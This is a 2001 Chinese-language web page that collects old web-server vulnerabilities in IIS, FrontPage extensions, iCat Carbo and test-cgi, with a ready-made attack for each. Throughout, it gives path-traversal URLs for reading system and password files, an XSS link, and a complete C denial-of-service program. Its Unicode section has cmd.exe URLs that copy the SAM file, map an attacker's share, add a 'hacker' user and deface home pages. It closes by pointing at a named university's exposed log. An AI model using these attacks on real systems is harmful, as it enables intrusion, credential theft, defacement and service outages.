[ 永遠的UNIX::UNIX技術資料的寶庫 ]   GB | BIG5
首頁 > 安全技術 > 其它 > 正文
一些收集來的經典漏洞
本文出自:網友推薦 作者: (2001-09-02 13:45:40)
☆carbo.dll☆ 

iCat Carbo服務器一個網絡購物程序,它被 PC雜評為最好的網絡購物軟件.安全專家Mikael Johansson發現
 iCat Carbo服務器版本 3.0.0.中存在一個漏洞,這個漏洞讓我們每個人查看系統中的任何文件在(除文件之
 外和一些特殊字符). 

攻擊方法: 



提交這樣的http請求 : 

http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog 



http會做如下回應: 

[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244] 



Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm' 



查看win.ini文件: c:\winnt\win.ini: 



http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog 

___________________________________________________________________________ 

☆uploader.exe☆ 



如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用uploader.exe上傳任何文件。 

攻擊方法: http://host/cgi-win/uploader.exe 

會帶你到上傳頁面,剩下的事就不用我告訴你了把?:) 

___________________________________________________________________________ 

☆search97.vts☆ 



這個文件將能使入侵者任意的讀取你系統中啟動httpd用戶能讀取的文件。 

攻擊方法: http://www.xxx.com/search97.vts 

?HLNavigate=On&querytext=dcm 

&ServerKey=Primary 

&ResultTemplate=../../../../../../../etc/passwd 

&ResultStyle=simple 

&ResultCount=20 

&collection=books 

___________________________________________________________________________ 

☆newdsn.exe☆ 



個存在/scripts/tools目錄下的newdsn.exe文件允許任何一個用戶在web根目錄下創建任何文件。另外,在某些
特定條件下,利用newdsn.exe可能使IIS遭受拒絕服務攻擊,如果攻擊成功,將導致IIS停止響應連接請求。 

攻擊方法: 

1. 創建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29
&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr= 

2. D.o.s攻擊:提交下列連接請求: 

http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase 



如果IIS是有問題的版本,瀏覽器將不會顯示任何信息。當下列兩種情況中的任意一種發生時,都會導致拒絕服務: 



- 重新啟動WWW服務時: 這將導致IIS掛起。不能重新啟動WWW服務,總是顯示"端口已經被佔用"的錯誤信息。 

- 停止WWW服務: IIS將會停止 。但是IIS的數據庫部分並沒有死掉,仍然會響應80端口發來的請求,因此,如果
再次提交一個請求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase 

IIS會產生保護性錯誤。 

___________________________________________________________________________ 

☆service.pwd☆ 



http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息. 

攻擊方法: 

訪問http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密碼文件,如果我們粗心的網管沒有設置權
限的話,那瀏覽器就會顯示出對方的密碼文件。 



___________________________________________________________________________ 

☆users.pwd☆ 



UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息。 

攻擊方法: 

訪問http://www.hostname.com/_vti_pvt/users.pwd。 



___________________________________________________________________________ 

☆authors.pwd☆ 



UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息。 

攻擊方法: 

訪問http://www.hostname.com/_vti_pvt/authors.pwd。 

___________________________________________________________________________ 

☆administrators.pwd☆ 



UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息。 

攻擊方法: 

訪問http://www.hostname.com/_vti_pvt/administrators.pwd。 



___________________________________________________________________________ 

☆shtml.dll☆ 



在Frontpage Extention Server/Windows2000 Server上輸入一個不存在的文件將可以得到web目錄的本地路徑信息. 
但是如果我們請求並非HTML、SHTML或者ASP綴的文件,我們將會得到不同的信息. 
<a href="http://TrustedServer/_vti_bin/shtml.dll/<script>Hostile Code Here</script>">http://TrustedServer</a>
如果用戶點擊上述指定的鏈接,腳本將通過HTTP請求從客戶端傳送給可信任的站點,可信任站點然將
該腳本作為錯誤信息的一部分返回給客戶端。客戶端在收到包含該腳本的出錯頁面時,將執行該腳本,並將賦予
來自可信任站點的內容的所有權力賦予該腳本。另外,shtml.dll對較長的帶html綴的文件名都會進行識別和處理,
利用這一點,可以對IIS服務器執行DOS攻擊,以下這個程序,能使目標服務器的CPU佔用率達到 100%,並且耗用所
有的應用程序日志空間。系統在數分鐘內會報告應用程序日志已滿。 

攻擊方法: 

1. 暴露路徑:http://www.victim.com/_vti_bin/shtml.dll/something.html 

這樣將返回以下信息: 

Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder. 

2. 可信任站點執行腳本:使用如下格式的URL: 
http://iis5server/_vti_bin/shtml.dll/<script>alert('document.domain='+document.domain)</script> ; 

3. D.o.s攻擊:使用下面的程序可以能使目標服務器的CPU佔用率達到 100%,並且耗用所有的應用程序日志空間。 

#include <stdio.h> 

#include <string.h> 

#include <winsock.h> 

#include <windows.h> 

#include <process.h> 



void Dos(void *chara); 



void main(int argc,char *argv[]) 



WORD wVersionRequested; 

WSADATA wsaData; 

int err; 

long lDo ; 

if (argc < 2) 



printf("Usage: %s IP\n",argv[0]); 

exit(1); 

return ; 





wVersionRequested = MAKEWORD( 2, 2 ); 



err = WSAStartup( wVersionRequested, &wsaData ); 

if ( err != 0 ) 



return; 





if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 ) 



WSACleanup( ); 

return; 







printf("wait ...\n"); 

for (lDo = 0 ;lDo < 1000;lDo++) 



//printf("1\n"); 

_beginthread(Dos, 0, (void*)argv[1]); 



Sleep( 1000000L ); 





void Dos(void *chara) 



long lLen; 

long lDo ; 

char *ip ; 

char buffer[2000]; 

struct sockaddr_in serv_addr; 

SOCKET sockfd ; 

char plusvuln[]="GET /_vti_bin/shtml.dll/"; 

ip= (char*)chara; 

memset(buffer,'\0',2000); 



serv_addr.sin_family =AF_INET; 

serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131"); 

serv_addr.sin_port = htons(80); 



if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0) 



printf("Create Socket faild \n"); 

return ; 





if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0) 



printf("Connect faild \n");; 



else 



lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 ); 

for (lDo = 0 ;lDo < 7000;lDo ++) 



lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ; 

if (lLen < 0 ) 



printf("Send faild \n"); 

return; 





lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ; 

//recv(sockfd,buffer,2000,0); 

//printf(buffer); 

//printf("\n"); 



closesocket(sockfd); 







___________________________________________________________________________ 

☆shtml.exe☆ 



微軟的 FrontPage Server Extensions存在一個遠程拒絕服務漏洞,可能遠程關閉一個web站點上的所有FrontPage操作。
通過提交一個包含DOS設備名的鏈接, FrontPage Server Extensions就會掛起,不再響應續的請求。為了恢復正常工作,
必須重新啟動IIS或者重新啟動機器。 

攻擊方法: 

提交這樣的鏈接,都可能使FrontPage Server Extensions停止響應: 
http://www.example.com/_vti_bin/shtml.exe/com1.htm 
http://www.example.com/_vti_bin/shtml.exe/prn.htm 
http://www.example.com/_vti_bin/shtml.exe/aux.htm 
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm 
http://www.example.com/_vti_bin/shtml.exe/com1.asp 
http://www.example.com/_vti_bin/shtml.exe/com1 . 

___________________________________________________________________________ 

☆queryhit.htm☆ 



如果queryhit.htm提出一個搜索頁面,那你便可以搜索和觀看這些文件。 

攻擊方法: 

訪問http://www.victim.com/samples/search/queryhit.htm 如果是搜索頁面,然在查找文件對話框裡輸入以下
字符串:[#filename=*.pwd],如果屏幕上出現一長串連接到以[.pwd]為擴展名的密碼文件的話,那就是所需要的東東了。 

___________________________________________________________________________ 

☆Dotdotdot☆ 



vqServer及Sybase PowerDynamo網站服務器存在著一個老的攻擊漏洞,此攻擊是關點點(..)的攻擊,這是由在
WINDOW中允許連續的點被解釋為級連的目錄如'cd ...',解釋為'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer
允許遠程攻擊者繞過WEB安全系統橫貫到其他目錄。 

攻擊方法: 

假如CONFIG.SYS存在在根目錄下,就能讀文件。 http://example.com/...................../config.sys 

列出根目錄。 http://example.com/ /../../../../../../ 

___________________________________________________________________________ 

☆autoexec.bat☆ 



現在很多web服務器上存在這個安全問題,例如Jana Webserver,URL Live 1.0 webserver等.惡意的用戶可能利用該漏洞
來退出HTTP root目錄,從而到達上層的目錄樹中.在URL中使用"../",攻擊者們可以獲得WEB SERVER有權讀取的任何文件. 

攻擊方法: http://127.0.0.1:8080/../../../autoexec.bat 這樣將讀取畹統中的autoexec.bat文件 

這個漏洞的利用還取決系統目錄的結構而定. 

___________________________________________________________________________ 

☆[color=red]achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr[/color]☆ 



IIS4.0中包含一個有趣的特征就是允許遠程用戶攻擊WEB服務器上的用戶帳號,就是你的WEB服務器是通過NAT來轉換地址的,
還可以被攻擊。每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個.htr文件,匿名用戶允許訪問這些
文件,這些文件剛好沒有規定只限制在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳
號和密碼。這個目錄物理映射在下面的目錄下: 

c:\winnt\system32\inetsrv\iisadmpwd 

攻擊方法: 

訪問:http://example.com/iisadmpwd/*.htr的頁面,並利用工具對其進行窮舉。 

___________________________________________________________________________ 

☆visadmin.exe☆ 



這個漏洞可以在服務器中一直產生臨時文件知道服務器的硬盤慢了為止。任何人都可以遠程的來完成。 

使用使用在cgi-bin中默認的 visadmin.exe (Visitor Administrator) 

攻擊方法: 

提交以下請求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest 

___________________________________________________________________________ 

☆no-such-file.pl☆ 



這個漏洞會暴露其服務器上的路徑,當你訪問這個頁面時會顯示類似以下信息: 

CGI Error 

The specified CGI application misbehaved by not returning a complete set of 

HTTP headers. The headers it did return are: 

Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or 

Directory 

從此我們可以知道這個頁面的物理路徑為C:\InetPub\scripts\no-such-file.pl 

攻擊方法: 

訪問http://www.targets.com/cgi-bin/scripts/no-such-file.pl 

___________________________________________________________________________ 

☆?PageServices☆ 



這個是可以顯示頁面清單的!運氣好的話還可以得到用戶名和密碼!(都是明文的) 

方法是url/?PageServices 還可以這樣試試 

/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver 
/?wp-stop-ver /?wp-uncheckout 



___________________________________________________________________________ 

☆test-cgi☆ 



test-cgi同樣是個常常出現的漏洞,在瀏覽器中輸入: 



http://thegnome.com/cgi-bin/test-cgi?\whatever 



將會返回: 



CGI/1.0 test script report: 



argc is 0. argv is . 



SERVER_SOFTWARE = NCSA/1.4B 

SERVER_NAME = thegnome.com 

GATEWAY_INTERFACE = CGI/1.1 

SERVER_PROTOCOL = HTTP/1.0 

SERVER_PORT = 80 

REQUEST_METHOD = GET 

HTTP_ACCEPT = text/plain, application/x-html, application/html, 

text/html, text/x-html 

PATH_INFO = 

PATH_TRANSLATED = 

SCRIPT_NAME = /cgi-bin/test-cgi 

QUERY_STRING = whatever 

REMOTE_HOST = fifth.column.gov 

REMOTE_ADDR = 200.200.200.200 

REMOTE_USER = 

AUTH_TYPE = 

CONTENT_TYPE = 

CONTENT_LENGTH = 



再來一次,這樣輸入: 



http://thegnome.com/ 





看到PASSWD了? 



用netcat 80 端口 進行攻擊: 



machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80 



返回: 



CGI/1.0 test script report: 



argc is 1. argv is /\*. 



SERVER_SOFTWARE = NCSA/1.4.1 

SERVER_NAME = removed.name.com 

GATEWAY_INTERFACE = CGI/1.1 

SERVER_PROTOCOL = HTTP/0.9 

SERVER_PORT = 80 

REQUEST_METHOD = GET 

HTTP_ACCEPT = 

PATH_INFO = 

PATH_TRANSLATED = 

SCRIPT_NAME = /bin/cgi-bin/test-cgi 

QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt 

/root /sbin /stand /sys /tmp /usr /usr2 /var 

REMOTE_HOST = remote.machine.com 

REMOTE_ADDR = 255.255.255.255 

REMOTE_USER = 

AUTH_TYPE = 

CONTENT_TYPE = 

CONTENT_LENGTH = 



顯示出了根目錄!這樣試試: 



machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80 



返回: 



CGI/1.0 test script report: 



argc is 1. argv is \*. 



SERVER_SOFTWARE = NCSA/1.4.1 

SERVER_NAME = removed.name.com 

GATEWAY_INTERFACE = CGI/1.1 

SERVER_PROTOCOL = HTTP/0.9 

SERVER_PORT = 80 

REQUEST_METHOD = GET 

HTTP_ACCEPT = 

PATH_INFO = 

PATH_TRANSLATED = 

SCRIPT_NAME = /bin/cgi-bin/test-cgi 

QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger 

cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html 

mail-query mail-query-2 majordomo majordomo.cf marker.cgi 

menu message.cgi munger.cgi munger.note ncsa-default.tar post-query 

query smartlist.cf src subscribe.cf test-cgi uptime 

REMOTE_HOST = remote.machine.com 

REMOTE_ADDR = 255.255.255.255 

REMOTE_USER = 

AUTH_TYPE = 

CONTENT_TYPE = 

CONTENT_LENGTH = 



顯示了/CGI-BIN/目錄下的東西 



___________________________________________________________________________ 

☆unicode☆ 



列目錄: 

http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 

http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 



建立文件夾的命令 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:\snowspider 



刪除空的文件夾命令: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\snowspider 



刪除文件的命令: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak 



Copy文件 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:
\inetpub\wwwroot\ 



NET USE的使用 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\temp 



改CMD方法 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\scripts\ccc.exe 

然 

http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp 



顯示目標主機當前的環境變量 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set 



FIND命令使用 

比如我要查看WEB目錄d:\inetpub\wwwroot下的所有asp、asa文件的內容: 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as* 



顯示某一路徑下相同文件類型的文件內容 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\*.ht* 



添加用戶命令 

新建一個用戶名為hacker密碼為password的用戶: 

http://xxx.xxx.xxx.xxx/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add 



修改主頁 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:\wwwroot\xxx\default.asp 

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwroot\xxx\default.asp 

這樣,主頁就被更改成了: 

Hacked by hacker 

12/1/2k 

關更多的unicode漏洞可以在本論壇查找。 



___________________________________________________________________________ 

☆_vti_inf.html☆ 

描述: web根目錄下存在_vti_inf.html文件,該文件是Frontpage extention server的特征,包含了一系列
Frontpage Extention Server的重要信息;而且Frontpage Extention server是一個有很多漏洞的web服務,用它入侵者可
能直接修改首頁文件,如果你讀http://www.victim.com/_vti_inf.html你將得到FP extensions的版本和它在服務器上
的路徑. 還有一些密碼文件如: 

http://www.victim.com/_vti_pvt/service.pwd 

http://www.victim.com/_vti_pvt/users.pwd 

http://www.victim.com/_vti_pvt/authors.pwd 

http://www.victim.com/_vti_pvt/administrators.pwd 



具體如何利用呢,我輸入 www.hostname.com/_vti_inf.html ,然查看 

源文件,發現的東東如何利用? 

解答:您可以先看看:http://www.shufe.edu.cn/ 

再看看:http://www.shufe.edu.cn/xcb/Server/logs/access_log 




(http://www.fanqiang.com)     進入【UNIX論壇
相關文章
 

★  樊強制作 歡迎分享  ★